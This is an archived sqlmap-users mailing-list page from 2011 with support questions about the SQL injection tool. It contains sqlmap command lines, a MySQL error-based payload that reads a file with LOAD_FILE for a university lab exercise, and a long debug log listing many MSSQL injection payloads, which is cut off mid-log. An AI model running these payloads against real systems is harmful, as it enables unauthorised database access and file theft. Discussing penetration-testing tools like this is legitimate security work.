sqlmap-users Mailing List for sqlmap (Page 105)
Brought to you by:
inquisb
Menu
▾
▴
sqlmap-users — sqlmap users mailing list
You can subscribe to this list here.
| 2008 |
Jan
|
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
(4) |
Oct
(11) |
Nov
(24) |
Dec
(13) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2009 |
Jan
(23) |
Feb
(17) |
Mar
(13) |
Apr
(48) |
May
(22) |
Jun
(18) |
Jul
(22) |
Aug
(13) |
Sep
(23) |
Oct
(6) |
Nov
(11) |
Dec
(25) |
| 2010 |
Jan
(21) |
Feb
(33) |
Mar
(61) |
Apr
(47) |
May
(48) |
Jun
(30) |
Jul
(24) |
Aug
(37) |
Sep
(52) |
Oct
(59) |
Nov
(32) |
Dec
(57) |
| 2011 |
Jan
(166) |
Feb
(93) |
Mar
(65) |
Apr
(117) |
May
(87) |
Jun
(124) |
Jul
(102) |
Aug
(78) |
Sep
(65) |
Oct
(22) |
Nov
(71) |
Dec
(79) |
| 2012 |
Jan
(93) |
Feb
(55) |
Mar
(45) |
Apr
(49) |
May
(56) |
Jun
(93) |
Jul
(95) |
Aug
(42) |
Sep
(26) |
Oct
(36) |
Nov
(32) |
Dec
(46) |
| 2013 |
Jan
(36) |
Feb
(78) |
Mar
(38) |
Apr
(57) |
May
(35) |
Jun
(39) |
Jul
(23) |
Aug
(33) |
Sep
(28) |
Oct
(38) |
Nov
(22) |
Dec
(16) |
| 2014 |
Jan
(33) |
Feb
(23) |
Mar
(41) |
Apr
(29) |
May
(12) |
Jun
(20) |
Jul
(21) |
Aug
(23) |
Sep
(18) |
Oct
(34) |
Nov
(12) |
Dec
(39) |
| 2015 |
Jan
(2) |
Feb
(51) |
Mar
(10) |
Apr
(28) |
May
(9) |
Jun
(22) |
Jul
(32) |
Aug
(35) |
Sep
(29) |
Oct
(50) |
Nov
(8) |
Dec
(2) |
| 2016 |
Jan
(8) |
Feb
(2) |
Mar
(3) |
Apr
(14) |
May
|
Jun
|
Jul
|
Aug
(12) |
Sep
|
Oct
|
Nov
(1) |
Dec
(19) |
| 2017 |
Jan
|
Feb
(18) |
Mar
|
Apr
(1) |
May
|
Jun
|
Jul
|
Aug
(4) |
Sep
|
Oct
|
Nov
(2) |
Dec
|
| 2018 |
Jan
|
Feb
|
Mar
(1) |
Apr
(1) |
May
(3) |
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
| 2019 |
Jan
|
Feb
|
Mar
|
Apr
(3) |
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
|
From: Johnny V. <Joh...@zo...> - 2011-02-12 00:27:34
|
Here is a sample of output I receive when I request "--current-user": ?~t|r8p?@?~?xx?n?zt I am using version 0.9-dev. Boolean based blind is the type of injection that was found. On Feb 11, 2011, at 5:41 PM, Miroslav Stampar wrote: > hi Johnny. > > it's not normal behavior :) > > you haven't told which version are you using? > > kr > > On Fri, Feb 11, 2011 at 9:42 PM, Johnny Venter <Joh...@zo...> wrote: >> Whenever I try to enumerate information from a vulnerable web app (with SQL 2008 back-end), the information is garbled/unreadable. >> >> I am using SQLi blind method. Is there something I can do to convert the returned data or is this normal? >> >> >> Thanks, J >> >> ------------------------------------------------------------------------------ >> The ultimate all-in-one performance toolkit: Intel(R) Parallel Studio XE: >> Pinpoint memory and threading errors before they happen. >> Find and fix more than 250 security defects in the development cycle. >> Locate bottlenecks in serial and parallel code that limit performance. >> http://p.sf.net/sfu/intel-dev2devfeb >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> > > > > -- > Miroslav Stampar > > E-mail: miroslav.stampar (at) gmail.com > Alternate: miroslav.stampar (at) mail.ru > PGP Key ID: 0xB5397B1B > Location: Zagreb, Croatia > > ------------------------------------------------------------------------------ > The ultimate all-in-one performance toolkit: Intel(R) Parallel Studio XE: > Pinpoint memory and threading errors before they happen. > Find and fix more than 250 security defects in the development cycle. > Locate bottlenecks in serial and parallel code that limit performance. > http://p.sf.net/sfu/intel-dev2devfeb > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users |
|
From: Miroslav S. <mir...@gm...> - 2011-02-11 23:14:23
|
hi Svyatoslav. we've got little carried away. please update to the latest revision (r3306) to have it implemented. please report if you notice any problems. kr p.s. if you want to test it's a must to use --referer to set it in the first place: python sqlmap.py -u "http://www.site.com/page" --flush-session --referer="www.site2.com" p.s. if you have other (GET) parameters you can force only testing of referer header by using option -p referer On Fri, Feb 11, 2011 at 11:39 PM, Miroslav Stampar <mir...@gm...> wrote: > hi Svyatoslav. > > we'll do it in next few days. > > kr > > On Fri, Feb 11, 2011 at 8:16 PM, Svyatoslav Lisin <se...@3d...> wrote: >> Hello friends. >> >> Please, add an ability to test REFERER header, as it is not affected by >> MAGIC_QUOTES. Currently only user-agent is being tested. >> >> Best regards, >> Svjatoslav Lisin >> >> >> >> ------------------------------------------------------------------------------ >> The ultimate all-in-one performance toolkit: Intel(R) Parallel Studio XE: >> Pinpoint memory and threading errors before they happen. >> Find and fix more than 250 security defects in the development cycle. >> Locate bottlenecks in serial and parallel code that limit performance. >> http://p.sf.net/sfu/intel-dev2devfeb >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > > -- > Miroslav Stampar > > E-mail: miroslav.stampar (at) gmail.com > Alternate: miroslav.stampar (at) mail.ru > PGP Key ID: 0xB5397B1B > Location: Zagreb, Croatia > -- Miroslav Stampar E-mail: miroslav.stampar (at) gmail.com Alternate: miroslav.stampar (at) mail.ru PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: Miroslav S. <mir...@gm...> - 2011-02-11 22:41:11
|
hi Johnny. it's not normal behavior :) you haven't told which version are you using? kr On Fri, Feb 11, 2011 at 9:42 PM, Johnny Venter <Joh...@zo...> wrote: > Whenever I try to enumerate information from a vulnerable web app (with SQL 2008 back-end), the information is garbled/unreadable. > > I am using SQLi blind method. Is there something I can do to convert the returned data or is this normal? > > > Thanks, J > > ------------------------------------------------------------------------------ > The ultimate all-in-one performance toolkit: Intel(R) Parallel Studio XE: > Pinpoint memory and threading errors before they happen. > Find and fix more than 250 security defects in the development cycle. > Locate bottlenecks in serial and parallel code that limit performance. > http://p.sf.net/sfu/intel-dev2devfeb > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar E-mail: miroslav.stampar (at) gmail.com Alternate: miroslav.stampar (at) mail.ru PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: Miroslav S. <mir...@gm...> - 2011-02-11 22:39:34
|
hi Svyatoslav. we'll do it in next few days. kr On Fri, Feb 11, 2011 at 8:16 PM, Svyatoslav Lisin <se...@3d...> wrote: > Hello friends. > > Please, add an ability to test REFERER header, as it is not affected by > MAGIC_QUOTES. Currently only user-agent is being tested. > > Best regards, > Svjatoslav Lisin > > > > ------------------------------------------------------------------------------ > The ultimate all-in-one performance toolkit: Intel(R) Parallel Studio XE: > Pinpoint memory and threading errors before they happen. > Find and fix more than 250 security defects in the development cycle. > Locate bottlenecks in serial and parallel code that limit performance. > http://p.sf.net/sfu/intel-dev2devfeb > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar E-mail: miroslav.stampar (at) gmail.com Alternate: miroslav.stampar (at) mail.ru PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: Miroslav S. <mir...@gm...> - 2011-02-11 22:34:31
|
hi Jarred.
you haven't stated which DBMS are you dealing with. probably MySQL?
if it's MySQL, I think that this line is not the one affected. you
won't be able to use stacked queries for MySQL/PHP for sure, while
also you won't be able to use INSERT statement to dump into file.
also, for sure, you won't be able to "modify" existing files.
kr
p.s. to read first 50 hex chars from C:\test.txt using that INSERT you
described:
http://192.168.117.129/test_environment/mysql/get_int.php?isdn=1&user=3&user2=2'
AND (SELECT 9822 FROM(SELECT COUNT(*),CONCAT((SELECT
MID(HEX(LOAD_FILE('c:/test.txt')),1,50)),FLOOR(RAND(0)*2))x FROM
library GROUP BY x)a) AND 'bla'='bla
On Fri, Feb 11, 2011 at 6:38 PM, <etc...@gm...> wrote:
> Hello!!
>
> I and my colleague have a problem for university, teacher say that we need
> to upload or modify an existing file and execute function of phpinfo();. We
> are seeing php code, and we think that sql injection is by this code:
>
> $sqlp = ", ($isdn, '$user2' )";
> $sql = "INSERT DELAYED INTO library (isdn, user) VALUES ($isdn,
> '$user')$sqlp";
>
> All GET and POST parameters from this php code are filtered with
> escapeshellcmd function but not parameter of user2, because is value from
> HTTP_X_FORWARDED_FOR. I know that I can modify header of HTT_X_FORWARDED_FOR
> and inject sql code, but I don't know how to save a file, maybe with UNION
> ... INTO OUTFILE? I had tried, but not worked (syntax error).
>
> Another information of problem is that user of db is root.
>
> Thanks!
>
> --
> Jarred
>
> ------------------------------------------------------------------------------
> The ultimate all-in-one performance toolkit: Intel(R) Parallel Studio XE:
> Pinpoint memory and threading errors before they happen.
> Find and fix more than 250 security defects in the development cycle.
> Locate bottlenecks in serial and parallel code that limit performance.
> http://p.sf.net/sfu/intel-dev2devfeb
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
--
Miroslav Stampar
E-mail: miroslav.stampar (at) gmail.com
Alternate: miroslav.stampar (at) mail.ru
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
|
|
From: Johnny V. <Joh...@zo...> - 2011-02-11 20:43:02
|
Whenever I try to enumerate information from a vulnerable web app (with SQL 2008 back-end), the information is garbled/unreadable. I am using SQLi blind method. Is there something I can do to convert the returned data or is this normal? Thanks, J |
|
From: Johnny V. <Joh...@zo...> - 2011-02-11 20:38:57
|
Whenever I try to enumerate information from a vulnerable web app (with SQL 2008 back-end), the information is garbled/unreadable. I am using SQLi blind method. Is there something I can do to convert the returned data or is this normal? Thanks, J |
|
From: Svyatoslav L. <se...@3d...> - 2011-02-11 19:43:05
|
Hello friends.
Please, add an ability to test REFERER header, as it is not affected by
MAGIC_QUOTES. Currently only user-agent is being tested.
Best regards,
Svjatoslav Lisin
|
|
From: <etc...@gm...> - 2011-02-11 17:38:32
|
Hello!! I and my colleague have a problem for university, teacher say that we need to upload or modify an existing file and execute function of phpinfo();. We are seeing php code, and we think that sql injection is by this code: $sqlp = ", ($isdn, '$user2' )"; $sql = "INSERT DELAYED INTO library (isdn, user) VALUES ($isdn, '$user')$sqlp"; All GET and POST parameters from this php code are filtered with escapeshellcmd function but not parameter of user2, because is value from HTTP_X_FORWARDED_FOR. I know that I can modify header of HTT_X_FORWARDED_FOR and inject sql code, but I don't know how to save a file, maybe with UNION ... INTO OUTFILE? I had tried, but not worked (syntax error). Another information of problem is that user of db is root. Thanks! -- Jarred |
|
From: David G. <sk...@gm...> - 2011-02-09 12:47:18
|
Tested, and it is ok now... Thank u.. =) On Wed, Feb 9, 2011 at 10:40 AM, Miroslav Stampar < mir...@gm...> wrote: > hi David. > > please update to the latest commit (r3289 - committed this moment) and > retry. > > kr > > On Wed, Feb 9, 2011 at 1:24 PM, David Guimaraes <sk...@gm...> wrote: > > There is an error with Sql Server querys.. probably in queries.xml ?? The > > problem are these two ORDER BY in query send to server (--db, --tables, > > etc.). I checked it after upgrading to the latest svn revision. > > > > 20111' AND > > 6339=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 0 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'trwh'='trwh > > [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the > > keyword 'ORDER'. > > > > Log: > > > > #./sqlmap.py --cookie "ASPSESSIONIDCABDBSQC=..." -u > > "http://www.vuln.com/path/default.asp?p=20111" -p p -v 3 --dbs --flush > > --batch | tee saida.txt > > > > sqlmap/0.9-dev - automatic SQL injection and database takeover tool > > http://sqlmap.sourceforge.net > > > > [*] starting at: 09:55:04 > > > > [09:55:04] [DEBUG] cleaning up configuration parameters > > [09:55:04] [DEBUG] setting the HTTP timeout > > [09:55:04] [DEBUG] setting the HTTP Cookie header > > [09:55:04] [DEBUG] setting the HTTP method to GET > > [09:55:04] [DEBUG] creating HTTP requests opener object > > [09:55:04] [WARNING] the testable parameter 'p' you provided is not into > the > > Cookie > > [09:55:04] [INFO] using '/path/sqlmap-dev/output/www.vuln.com/session' > as > > session file > > [09:55:04] [INFO] flushing session file > > [09:55:04] [INFO] testing connection to the target url > > [09:55:05] [INFO] testing if the url is stable, wait a few seconds > > [09:55:06] [INFO] url is stable > > [09:55:06] [PAYLOAD] 20111'(''')"('' > > [09:55:07] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:07] [INFO] heuristic test shows that GET parameter 'p' might be > > injectable (possible DBMS: Microsoft SQL Server) > > [09:55:07] [INFO] testing sql injection on GET parameter 'p' > > [09:55:07] [INFO] testing 'AND boolean-based blind - WHERE or HAVING > clause' > > [09:55:07] [PAYLOAD] 20111) AND 4197=5111 AND (1965=1965 > > [09:55:08] [DEBUG] setting match ratio for current parameter to 0.952 > > [09:55:08] [PAYLOAD] 20111) AND 4255=4255 AND (6152=6152 > > [09:55:08] [PAYLOAD] 20111 AND 3013=569 > > [09:55:08] [DEBUG] setting match ratio for current parameter to 0.952 > > [09:55:08] [PAYLOAD] 20111 AND 4255=4255 > > [09:55:09] [PAYLOAD] 20111') AND 513=8635 AND ('kiwS'='kiwS > > [09:55:09] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:09] [PAYLOAD] 20111') AND 4255=4255 AND ('ofle'='ofle > > [09:55:09] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:09] [PAYLOAD] 20111' AND 8628=4076 AND 'Jbgn'='Jbgn > > [09:55:10] [DEBUG] setting match ratio for current parameter to 0.952 > > [09:55:10] [PAYLOAD] 20111' AND 4255=4255 AND 'obQa'='obQa > > [09:55:10] [PAYLOAD] 20111' AND 9514=9437 AND 'ZUZG'='ZUZG > > [09:55:11] [INFO] GET parameter 'p' is 'AND boolean-based blind - WHERE > or > > HAVING clause' injectable > > [09:55:11] [DEBUG] skipping test 'AND boolean-based blind - WHERE or > HAVING > > clause (Generic comment)' because the payload for boolean-based blind has > > already been identified > > [09:55:11] [DEBUG] skipping test 'OR boolean-based blind - WHERE or > HAVING > > clause' because the payload for boolean-based blind has already been > > identified > > [09:55:11] [DEBUG] skipping test 'OR boolean-based blind - WHERE or > HAVING > > clause (Generic comment)' because the payload for boolean-based blind has > > already been identified > > [09:55:11] [DEBUG] skipping test 'Generic boolean-based blind - Parameter > > replace' because the payload for boolean-based blind has already been > > identified > > [09:55:11] [DEBUG] skipping test 'Generic boolean-based blind - Parameter > > replace (original value)' because the payload for boolean-based blind has > > already been identified > > [09:55:11] [DEBUG] skipping test 'Generic boolean-based blind - GROUP BY > and > > ORDER BY clauses' because the payload for boolean-based blind has already > > been identified > > [09:55:11] [DEBUG] skipping test 'Generic boolean-based blind - GROUP BY > and > > ORDER BY clauses (original value)' because the payload for boolean-based > > blind has already been identified > > [09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase > boolean-based > > blind - Parameter replace (original value)' because the payload for > > boolean-based blind has already been identified > > [09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase > boolean-based > > blind - ORDER BY clause' because the payload for boolean-based blind has > > already been identified > > [09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase stacked > > conditional-error blind queries' because the payload for boolean-based > blind > > has already been identified > > [09:55:11] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - > > WHERE or HAVING clause' > > [09:55:11] [PAYLOAD] 20111' AND > > 87=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > (CASE WHEN (87=87) THEN CHAR(49) ELSE CHAR(48) > > END))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'wAZl'='wAZl > > [09:55:11] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:11] [INFO] GET parameter 'p' is 'Microsoft SQL Server/Sybase AND > > error-based - WHERE or HAVING clause' injectable > > [09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase AND > > error-based - WHERE or HAVING clause (IN)' because the payload for > > error-based has already been identified > > [09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase OR > error-based > > - WHERE or HAVING clause' because the payload for error-based has already > > been identified > > [09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase OR > error-based > > - WHERE or HAVING clause (IN)' because the payload for error-based has > > already been identified > > [09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase error-based > - > > Parameter replace' because the payload for error-based has already been > > identified > > [09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase error-based > - > > ORDER BY clause' because the payload for error-based has already been > > identified > > [09:55:11] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries' > > [09:55:11] [PAYLOAD] 20111'; WAITFOR DELAY '0:0:5';-- AND 'Hlos'='Hlos > > [09:55:17] [PAYLOAD] 20111'; WAITFOR DELAY '0:0:5';-- AND 'Hlos'='Hlos > > [09:55:22] [INFO] GET parameter 'p' is 'Microsoft SQL Server/Sybase > stacked > > queries' injectable > > [09:55:22] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' > > [09:55:22] [PAYLOAD] 20111' WAITFOR DELAY '0:0:5'-- AND 'YKua'='YKua > > [09:55:27] [PAYLOAD] 20111' WAITFOR DELAY '0:0:5'-- AND 'YKua'='YKua > > [09:55:33] [INFO] GET parameter 'p' is 'Microsoft SQL Server/Sybase > > time-based blind' injectable > > [09:55:33] [DEBUG] skipping test 'Microsoft SQL Server/Sybase AND > time-based > > blind (heavy query)' because the payload for AND/OR time-based blind has > > already been identified > > [09:55:33] [DEBUG] skipping test 'Microsoft SQL Server/Sybase AND > time-based > > blind (heavy query - comment)' because the payload for AND/OR time-based > > blind has already been identified > > [09:55:33] [DEBUG] skipping test 'Microsoft SQL Server/Sybase OR > time-based > > blind (heavy query)' because the payload for AND/OR time-based blind has > > already been identified > > [09:55:33] [DEBUG] skipping test 'AND boolean-based blind - WHERE or > HAVING > > clause (MySQL comment)' because the payload for boolean-based blind has > > already been identified > > [09:55:33] [DEBUG] skipping test 'OR boolean-based blind - WHERE or > HAVING > > clause (MySQL comment)' because the payload for boolean-based blind has > > already been identified > > [09:55:33] [DEBUG] skipping test 'MySQL boolean-based blind - WHERE or > > HAVING clause (RLIKE)' because the payload for boolean-based blind has > > already been identified > > [09:55:33] [DEBUG] skipping test 'MySQL boolean-based blind - Parameter > > replace (MAKE_SET - original value)' because the payload for > boolean-based > > blind has already been identified > > [09:55:33] [DEBUG] skipping test 'MySQL boolean-based blind - Parameter > > replace (ELT - original value)' because the payload for boolean-based > blind > > has already been identified > > [09:55:33] [DEBUG] skipping test 'MySQL >= 5.0 boolean-based blind - > > Parameter replace (original value)' because the payload for boolean-based > > blind has already been identified > > [09:55:33] [DEBUG] skipping test 'MySQL < 5.0 boolean-based blind - > > Parameter replace (original value)' because the payload for boolean-based > > blind has already been identified > > [09:55:33] [DEBUG] skipping test 'Oracle boolean-based blind - Parameter > > replace (original value)' because the payload for boolean-based blind has > > already been identified > > [09:55:33] [DEBUG] skipping test 'MySQL >= 5.0 boolean-based blind - > GROUP > > BY and ORDER BY clauses' because the payload for boolean-based blind has > > already been identified > > [09:55:33] [DEBUG] skipping test 'MySQL < 5.0 boolean-based blind - GROUP > BY > > and ORDER BY clauses' because the payload for boolean-based blind has > > already been identified > > [09:55:33] [DEBUG] skipping test 'Oracle boolean-based blind - GROUP BY > and > > ORDER BY clauses' because the payload for boolean-based blind has already > > been identified > > [09:55:33] [DEBUG] skipping test 'MySQL stacked conditional-error blind > > queries' because the payload for boolean-based blind has already been > > identified > > [09:55:33] [DEBUG] skipping test 'PostgreSQL stacked conditional-error > blind > > queries' because the payload for boolean-based blind has already been > > identified > > [09:55:33] [DEBUG] skipping test 'MySQL >= 5.0 AND error-based - WHERE or > > HAVING clause' because the payload for error-based has already been > > identified > > [09:55:33] [DEBUG] skipping test 'PostgreSQL AND error-based - WHERE or > > HAVING clause' because the payload for error-based has already been > > identified > > [09:55:33] [DEBUG] skipping test 'Oracle AND error-based - WHERE or > HAVING > > clause (XMLType)' because the payload for error-based has already been > > identified > > [09:55:33] [DEBUG] skipping test 'Oracle AND error-based - WHERE or > HAVING > > clause (utl_inaddr.get_host_address)' because the payload for error-based > > has already been identified > > [09:55:33] [DEBUG] skipping test 'Oracle AND error-based - WHERE or > HAVING > > clause (ctxsys.drithsx.sn)' because the payload for error-based has > already > > been identified > > [09:55:33] [DEBUG] skipping test 'Firebird AND error-based - WHERE or > HAVING > > clause' because the payload for error-based has already been identified > > [09:55:33] [DEBUG] skipping test 'MySQL >= 5.0 OR error-based - WHERE or > > HAVING clause' because the payload for error-based has already been > > identified > > [09:55:33] [DEBUG] skipping test 'MySQL OR error-based - WHERE or HAVING > > clause' because the payload for error-based has already been identified > > [09:55:33] [DEBUG] skipping test 'PostgreSQL OR error-based - WHERE or > > HAVING clause' because the payload for error-based has already been > > identified > > [09:55:33] [DEBUG] skipping test 'Oracle OR error-based - WHERE or HAVING > > clause (XMLType)' because the payload for error-based has already been > > identified > > [09:55:33] [DEBUG] skipping test 'Oracle OR error-based - WHERE or HAVING > > clause (utl_inaddr.get_host_address)' because the payload for error-based > > has already been identified > > [09:55:33] [DEBUG] skipping test 'Oracle OR error-based - WHERE or HAVING > > clause (ctxsys.drithsx.sn)' because the payload for error-based has > already > > been identified > > [09:55:33] [DEBUG] skipping test 'Firebird OR error-based - WHERE or > HAVING > > clause' because the payload for error-based has already been identified > > [09:55:33] [DEBUG] skipping test 'MySQL >= 5.0 error-based - Parameter > > replace' because the payload for error-based has already been identified > > [09:55:33] [DEBUG] skipping test 'PostgreSQL error-based - Parameter > > replace' because the payload for error-based has already been identified > > [09:55:33] [DEBUG] skipping test 'Oracle error-based - Parameter replace' > > because the payload for error-based has already been identified > > [09:55:33] [DEBUG] skipping test 'Firebird error-based - Parameter > replace' > > because the payload for error-based has already been identified > > [09:55:33] [DEBUG] skipping test 'MySQL >= 5.0 error-based - GROUP BY and > > ORDER BY clauses' because the payload for error-based has already been > > identified > > [09:55:33] [DEBUG] skipping test 'PostgreSQL error-based - GROUP BY and > > ORDER BY clauses' because the payload for error-based has already been > > identified > > [09:55:33] [DEBUG] skipping test 'Oracle error-based - GROUP BY and ORDER > BY > > clauses' because the payload for error-based has already been identified > > [09:55:33] [DEBUG] skipping test 'MySQL > 5.0.11 stacked queries' because > > the payload for stacked queries has already been identified > > [09:55:33] [DEBUG] skipping test 'MySQL < 5.0.12 stacked queries (heavy > > query)' because the payload for stacked queries has already been > identified > > [09:55:33] [DEBUG] skipping test 'PostgreSQL > 8.1 stacked queries' > because > > the payload for stacked queries has already been identified > > [09:55:33] [DEBUG] skipping test 'PostgreSQL stacked queries (heavy > query)' > > because the payload for stacked queries has already been identified > > [09:55:33] [DEBUG] skipping test 'PostgreSQL < 8.2 stacked queries > (Glibc)' > > because the payload for stacked queries has already been identified > > [09:55:33] [DEBUG] skipping test 'Oracle stacked queries > > (DBMS_PIPE.RECEIVE_MESSAGE)' because the payload for stacked queries has > > already been identified > > [09:55:33] [DEBUG] skipping test 'Oracle stacked queries (heavy query)' > > because the payload for stacked queries has already been identified > > [09:55:33] [DEBUG] skipping test 'Oracle stacked queries > (DBMS_LOCK.SLEEP)' > > because the payload for stacked queries has already been identified > > [09:55:33] [DEBUG] skipping test 'Oracle stacked queries > (USER_LOCK.SLEEP)' > > because the payload for stacked queries has already been identified > > [09:55:33] [DEBUG] skipping test 'SQLite > 2.0 stacked queries (heavy > > query)' because the payload for stacked queries has already been > identified > > [09:55:33] [DEBUG] skipping test 'Firebird stacked queries (heavy query)' > > because the payload for stacked queries has already been identified > > [09:55:33] [DEBUG] skipping test 'MySQL > 5.0.11 AND time-based blind' > > because the payload for AND/OR time-based blind has already been > identified > > [09:55:33] [DEBUG] skipping test 'MySQL > 5.0.11 AND time-based blind > > (comment)' because the payload for AND/OR time-based blind has already > been > > identified > > [09:55:33] [DEBUG] skipping test 'MySQL < 5.0.12 AND time-based blind > (heavy > > query)' because the payload for AND/OR time-based blind has already been > > identified > > [09:55:33] [DEBUG] skipping test 'MySQL < 5.0.12 AND time-based blind > (heavy > > query - comment)' because the payload for AND/OR time-based blind has > > already been identified > > [09:55:33] [DEBUG] skipping test 'PostgreSQL > 8.1 AND time-based blind' > > because the payload for AND/OR time-based blind has already been > identified > > [09:55:33] [DEBUG] skipping test 'PostgreSQL > 8.1 AND time-based blind > > (comment)' because the payload for AND/OR time-based blind has already > been > > identified > > [09:55:33] [DEBUG] skipping test 'PostgreSQL AND time-based blind (heavy > > query)' because the payload for AND/OR time-based blind has already been > > identified > > [09:55:33] [DEBUG] skipping test 'PostgreSQL AND time-based blind (heavy > > query - comment)' because the payload for AND/OR time-based blind has > > already been identified > > [09:55:33] [DEBUG] skipping test 'Oracle AND time-based blind' because > the > > payload for AND/OR time-based blind has already been identified > > [09:55:33] [DEBUG] skipping test 'Oracle AND time-based blind (comment)' > > because the payload for AND/OR time-based blind has already been > identified > > [09:55:33] [DEBUG] skipping test 'Oracle AND time-based blind (heavy > query)' > > because the payload for AND/OR time-based blind has already been > identified > > [09:55:33] [DEBUG] skipping test 'Oracle AND time-based blind (heavy > query - > > comment)' because the payload for AND/OR time-based blind has already > been > > identified > > [09:55:33] [DEBUG] skipping test 'SQLite > 2.0 AND time-based blind > (heavy > > query)' because the payload for AND/OR time-based blind has already been > > identified > > [09:55:33] [DEBUG] skipping test 'SQLite > 2.0 AND time-based blind > (heavy > > query - comment)' because the payload for AND/OR time-based blind has > > already been identified > > [09:55:33] [DEBUG] skipping test 'Firebird AND time-based blind (heavy > > query)' because the payload for AND/OR time-based blind has already been > > identified > > [09:55:33] [DEBUG] skipping test 'Firebird AND time-based blind (heavy > query > > - comment)' because the payload for AND/OR time-based blind has already > been > > identified > > [09:55:33] [DEBUG] skipping test 'MySQL > 5.0.11 OR time-based blind' > > because the payload for AND/OR time-based blind has already been > identified > > [09:55:33] [DEBUG] skipping test 'MySQL < 5.0.12 OR time-based blind > (heavy > > query)' because the payload for AND/OR time-based blind has already been > > identified > > [09:55:33] [DEBUG] skipping test 'PostgreSQL > 8.1 OR time-based blind' > > because the payload for AND/OR time-based blind has already been > identified > > [09:55:33] [DEBUG] skipping test 'PostgreSQL OR time-based blind (heavy > > query)' because the payload for AND/OR time-based blind has already been > > identified > > [09:55:33] [DEBUG] skipping test 'Oracle OR time-based blind' because the > > payload for AND/OR time-based blind has already been identified > > [09:55:33] [DEBUG] skipping test 'Oracle OR time-based blind (heavy > query)' > > because the payload for AND/OR time-based blind has already been > identified > > [09:55:33] [DEBUG] skipping test 'SQLite > 2.0 OR time-based blind (heavy > > query)' because the payload for AND/OR time-based blind has already been > > identified > > [09:55:33] [DEBUG] skipping test 'Firebird OR time-based blind (heavy > > query)' because the payload for AND/OR time-based blind has already been > > identified > > [09:55:33] [DEBUG] skipping test 'MySQL UNION query (NULL) - 1 to 10 > > columns' because the back-end DBMS identified is Microsoft SQL Server > > [09:55:33] [DEBUG] skipping test 'MySQL UNION query (NULL) - 11 to 20 > > columns' because the level is higher than the provided > > [09:55:33] [DEBUG] skipping test 'MySQL UNION query (NULL) - 21 to 30 > > columns' because the level is higher than the provided > > [09:55:33] [DEBUG] skipping test 'MySQL UNION query (NULL) - 31 to 40 > > columns' because the level is higher than the provided > > [09:55:33] [DEBUG] skipping test 'MySQL UNION query (NULL) - 41 to 50 > > columns' because the level is higher than the provided > > [09:55:33] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' > > [09:55:33] [PAYLOAD] 20111' UNION ALL SELECT NULL-- AND 'vrjZ'='vrjZ > > [09:55:34] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:34] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL-- AND > 'GZNB'='GZNB > > [09:55:34] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:34] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL-- AND > > 'dLhE'='dLhE > > [09:55:35] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:35] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL, NULL-- AND > > 'XeTw'='XeTw > > [09:55:35] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:35] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL, NULL, > NULL-- > > AND 'trjE'='trjE > > [09:55:36] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:36] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL, NULL, > NULL, > > NULL-- AND 'rjRE'='rjRE > > [09:55:37] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:37] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL, NULL, > NULL, > > NULL, NULL-- AND 'vmHq'='vmHq > > 